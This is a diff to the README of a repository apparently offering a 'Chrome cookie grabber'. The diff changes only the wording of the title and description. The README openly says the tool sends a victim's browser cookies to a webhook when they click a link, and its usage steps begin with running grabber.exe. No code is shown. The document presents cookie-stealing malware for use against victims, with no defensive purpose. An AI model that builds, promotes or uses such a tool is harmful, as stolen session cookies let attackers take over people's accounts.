H4cking-Esentials/Cookie-Grabber-Creator/README.md

 # cookie-grabbber
-This will grab all chrome cookies
+Cookie Grabber

-A simple chrome cookie grabber.
+This is a simple chrome cookie grabber.
 When you victim clicks on a link their cookies are sent to a webhook.

 How to use
 1. Run grabber.exe